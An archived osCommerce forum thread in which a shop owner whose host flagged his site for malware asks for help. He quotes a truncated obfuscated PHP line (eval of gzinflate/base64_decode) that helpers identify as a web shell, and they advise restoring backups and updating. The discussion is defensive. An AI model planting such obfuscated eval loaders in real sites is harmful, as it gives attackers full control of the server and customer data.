Jump to content

Archived

This topic is now archived and is closed to further replies.

jerys1974

Hacker Attack

Recommended Posts

Hi,

It's the first time I write here but the italian forum don't ask me and I didn't find topic about my problems.

About 10 days, my host stopped my website becouse they say into my website are malware.

Mxtoolbox and other check my Ip but for them it's ok.

I find some file:

account_history_edit_full.php

contains a strange strings:

<?PHP $login='';$pass='';$md5_pass='';eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6

It's very very strong and I attach here only first strings.

 

More, in other file, I find into the file this strings (Hostmonster say this is a Malware):

<META HTTP-EQUIV="refresh" content="2; URL=' . osc_href_link_admin(FILENAME_DEFAULT, 'newsletters&page=' . $_GET['page'] . '&nmID=' . $this->_newsletter_id . '&action=nmSendConfirm&customer=' . $customer) . '">';

 

and

// Hacked by Lance Rushing

$b = 64; // byte length for md5
if (strlen($key) > $b) {
$key = pack("H*",md5($key));
}
$key = str_pad($key, $b, chr(0x00));
$ipad = str_pad('', $b, chr(0x36));
$opad = str_pad('', $b, chr(0x5c));
$k_ipad = $key ^ $ipad ;
$k_opad = $key ^ $opad;

return md5($k_opad . pack("H*",md5($k_ipad . $data)));
}
// end code from lance (resume authorize.net code)

 

What do you about it?

Thank you

Emanuele

Share this post


Link to post
Share on other sites

What version of osCommerce are you using ?


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

The "lance rushing" is a flase positive and nothing to be concerned about. The other is a genuine hack by the look of it, can you post the full
 

eval(gzinflate(base64_decode(

line of code.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

@@jerys1974 You will need to clear your files. If you have a backup from before this happened, it will be much easier to do. But either way, you will need to download all of your files and search them for hacker code. You can search the files for something common and unique to the hacker, like "return md5". But you will have to delete such code correctly or it will break your shop. You also need to be sure to remove any extra files the hacker may have added. If you don't know how to do that, you will have to pay someone to do it for you. I suggest that once you have this cleaned, you run the security test on my site since your version most likely has security issues that let the hacker in in the first place.

Share this post


Link to post
Share on other sites

Post the full line of code, the line that you only posted a tiny piece of.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

Thanks Jack_mcs.

you confirm me that md5 is an hacker strings.

Now my server say that files are malware and It want I delete all files to my site but, for me they are ok.

I post the source:

 

<?php
/*
$Id: shipping.php,v 1.3 2001/12/20 14:14:15 dgw_ Exp $
 
Localizzazione di Mauro Dalu - iPassion www.ipassion.it
adattata per la snapshot del 9 Settembre 2002.
Basata sulla localizzazione originale di Opencommercio.com
riveduta e corretta da Tarantino Afostino agotar@@tin.it
Tricase Lecce Italy 31/05/2002 00.03.14
Rilasciata sotto GNU General Public License
*/
 
define('NAVBAR_TITLE', 'Spedizioni e Consegna');
define('HEADING_TITLE', 'Spedizioni e Consegna');
 
define('TEXT_INFORMATION', 'TIPOLOGIE DI PAGAMENTO<br>
<br>
<br>
<font color="#de0884">
Pagamento alla consegna (Contrassegno)</font><br>
<br>
Il pagamento in contanti (contrassegno) è sottoposto alle seguenti condizioni:<br>
<br>1. Il pagamento deve essere eseguito esclusivamente in contanti (non sono accettati assegni bancari) direttamente al corriere al momento della consegna;<br>
2. Questo metodo di pagamento prevede un costo aggiuntivo di €7.50 che verrà calcolato prima della conferma dell\'ordine da parte del cliente.<br>3. Il valore massimo, per questo tipo di pagamento, è di 500€. Per l\'importo eccedente occorre effettuare un pagamento anticipato a mezzo bonifico bancario. Es. Ordine totale di 592€: 92€ bonifico anticipato e 500€ pagamento al corriere al momento della consegna. Emanuel Cristalli si riserva comunque il diritto di richiedere un anticipo pari al 20% dell\'importo totale anche per importi inferiori ad €500.<br>
<br>
<br>
<br>
<font color="#de0884">
Bonifico bancario</font><br>
<br>In caso di pagamento tramite Bonifico Bancario Anticipato, quanto ordinato dal Cliente verrà mantenuto impegnato fino al ricevimento del bonifico per un massimo di 5 giorni. l\'invio di quanto ordinato avverrà solo all\'atto dell\'effettivo accredito della somma dovuta sul c/c di Emanuel Cristalli. Per facilitare il riconoscimento dei pagamenti si prega di inserire come causale il proprio numero ordine.<br>
<br>
<br>
<br>
<font color="#de0884">
Vaglia Postale</font><br>
<br>
Il pagamento verrà effettuato tramite Vaglia Postale con gli estremi che riceverai al momento dell\'ordine inserendo come causale il numero d\'ordine. Al fine di prenotare la merce con la disponibilità visualizzata al momento dell\'ordine ti preghiamo di inviare il prima possibile comunicazione di avvenuto pagamento.<br>
<br>
<br>
<br>
<font color="#de0884">Carta di credito</font> <img src="images/pagamenti/paypal_logo.gif" alt="" width="80" height="24" border="0"><img src="images/pagamenti/logo_ccVisa.gif" alt="" width="37" height="21" border="0"><img src="images/pagamenti/logo_ccMC.gif" alt="" width="37" height="21" border="0"><br>I circuiti accettati per pagamenti su Emanuel Cristalli sono Circuito Visa e Circuito MasterCard .<br>Per chi utilizza le carte di credito, Emanuel Cristalli ha scelto il circuito di pagamento elettronico di Paypal. Per garantire la massima sicurezza, la transazione di pagamento è effettuata direttamente sul server sicuro della banca. Pertanto, i numeri delle carte di credito del cliente non vengono memorizzati sul sito di Emanuel Cristalli e i dati risiedono esclusivamente nel circuito di Paypal. PayPal utilizza il protocollo SSL per crittografare i dati trasmessi tra PayPal e il tuo browser.<br>
<br>
<br>
<br>
<font color="#de0884">Ricarica Postepay </font> <img src="images/pagamenti/cartapostepay02s.jpg" alt="" width="85" height="73" border="0"><br>
Effettuabile in qualsiasi ufficio postale la ricarica Postepay è semplice e veloce. Al fine di prenotare la merce con la disponibilità visualizzata al momento dell\'ordine ti preghiamo di inviare il prima possibile comunicazione di avvenuto pagamento.<br>
</p>
<p><br>
<br>
SPEDIZIONE SDA  <img src="images/pagamenti/logo_sda.gif" alt="" width="80" height="32" border="0"><br>
<br>
<br>
<font color="#de0884"> Info generali</font><br>
<br>
Emanuel Cristalli spedisce la sua merce in tutta Italia esclusivamente tramite corriere espresso. Le spedizioni, salvo diversi accordi, saranno effettute a mezzo trasportatori definiti a cura di Emanuel Cristalli. L\'assicurazione è non è inclusa nei costi di spedizione, anche in caso di promozioni con spedizione gratuita. In caso di furto/smarrimento Emanuel Cristalli si impegna ad inviare un nuovo prodotto e, ove lo stesso dovesse essere indisponibile e/o esaurito, proporrà un diverso prodotto, ma con caratteristiche equivalenti o superiori, con facoltà per il cliente di non accettare tale nuovo prodotto e richiedere il rimborso del prodotto stesso. Al momento della consegna della merce, il Cliente è tenuto a controllare che il numero dei colli in consegna corrisponda a quanto indicato nel documento di trasporto e che l\'imballo risulti integro, non danneggiato, né bagnato o comunque alterato, anche nei materiali di chiusura (nastro adesivo o reggette metalliche). Eventuali danni o la mancata corrispondenza del numero dei colli o delle indicazioni, devono essere immediatamente contestata al corriere che effettua la consegna. Una volta firmato il documento del corriere, il Cliente non potrà opporre alcuna contestazione circa le caratteristiche esteriori di quanto consegnato. I corrieri utilizzati non effettuano telefonate preventive nè gestiscono richieste di spedizioni in orari particolari. Indicativamente, senza che ciò comporti alcun vincolo per Emanuel Cristalli e salvo la disponibilità sul mercato dei prodotti oltre ad eventuali cause di forza maggiore, la merce verrà consegnata da Emanuel Cristalli al corriere entro 48 ore dal primo giorno lavorativo utile successivo alla data di ricezione dell\'ordine (nel caso di pagamento mediante carta di credito o pagamento tramite contrassegno al corriere).<br>
<br>
<br>
<br>
<font color="#de0884"> Costo e Tempi di consegna</font><br>
<br>
Il tempo di consegna, puramente indicativo è di 24/48 ore dalla data di spedizione, lo stesso potrà subire variazioni per cause di forza maggiore o a causa delle condizioni del traffico e della viabilità in genere o per atto delle Autorità. Il tempo di consegna avverà negli orari di ufficio: dalle ore 8.30 alle 12.30; dalle 15.30 alle ore 19.30, di tutti i giorni, non festivi, dal lunedì al venerdì. I corrieri utilizzati non effettuano telefonate preventive nè gestiscono richieste di spedizioni in orari particolari. Le spese di trasporto per ordini inferiori a € 100 ammontano a: <BR>- € 7 + IVA per pagamenti anticipati;<BR>- € 15 + IVA per pagamenti contrassegno <BR> <BR> Per ordini superiori a euro 100, le spese di trasporto sono gratuite per i pagamenti anticipati, mentre per il pagamento contrassegno, le spese ammontano al solo contributo per contrassegno. Queste tariffe sono valide per il solo territorio italiano.<br>
<br>
<br>
<br>
Tracking<br>
<br>
Per monitorare la tua spedizione <a href="http://www.sda.it" target="_blank">  clicca qui. </a><br>
<br>');
 
 
?>
 
I would like to know if I'm stupid or my host is exaggerating

Share this post


Link to post
Share on other sites

This is a full shell that gives the attacker access to everything including database.  You need to close down your shop today.  Load your clean backup.

 

This gives you a breathing space while you update to the latest version of osCommerce.

 

Learn from this:  keep your software up to date.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

If I delete all files with md5 I'm not sure? I need  delete everything?

You are right about keep my software up to date but, when the OSC is change from 2.2 to 2.3 or 3, It's changed a lot of thing that I can't learn and... I hope that you can understand me.

Share this post


Link to post
Share on other sites

You have no clue what has been changed and where by these people, so you need to delete everything and load your clean backup - you do have a backup right ?

 

If you don't then you need to start from fresh with the latest version of osCommerce - you might be able to save and use your existing database, depending on what the hackers have done with it.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

The files affected by virus, HostMonster reported them to me ... but I warn 3/4 files that I can not understand where is the string modified by hackers.

Just curious ... Can I can the code of those fail, to see if they are really suffering from malware?

Share this post


Link to post
Share on other sites

 

Thanks Jack_mcs.

you confirm me that md5 is an hacker strings.

Now my server say that files are malware and It want I delete all files to my site but, for me they are ok.

 
I would like to know if I'm stupid or my host is exaggerating

 

MD5 was just an example. It may or may not be in your shop already as legitimate code. A better example might be part of the string the hacker added, like "'HJ3HkqNQEkU/" since that should not be in your files. You can't delete the files that have been infected, unless you have backups to replace them with. And even if you search for that code and remove all that you find, it doesn't mean that you will have removed all of the hacker code since, many times, hackers will add files to use. If this shop is for an online business I don't suggest you guess at how to clean it. If you miss something it could cause your customers data to be exposed and you may have problems for years to come.

Share this post


Link to post
Share on other sites

It's very important now, back online.

I have 3 important site: 1 with joomla and 2 we osc 2.2

the osc it's not only e-commerce but, for my work, It's a catalogue on-line. I would like to back online and after, I can work to new website with os 2.3.4 (the osc 3.0 is stopped, really?) but my host don't show my websites until everything is clean.

But it's hard for me back online becouse he say that 3/4 files are malware but It's not true. I download the "vergin" version of 2.2 and the files are ok. I compare the original "vergin" with the files into the site and they are the same.

Share this post


Link to post
Share on other sites

It's not uncommon for a hacker to change hundreds of files, especially in older shops. But sometimes they try to change them and it fails but the datestamp on the file gets changed. So if your host is just looking at dates, they may be incorrect.

 

I suggest asking your host for an example of one of the hacked files so you can be sure you are comparing the correct ones. It would help if they pointed out what code is at fault. Some hosts that are not familiar with dynamic sites may think legitimate code is hacker code, though I would think they could figure that out. .

Share this post


Link to post
Share on other sites

×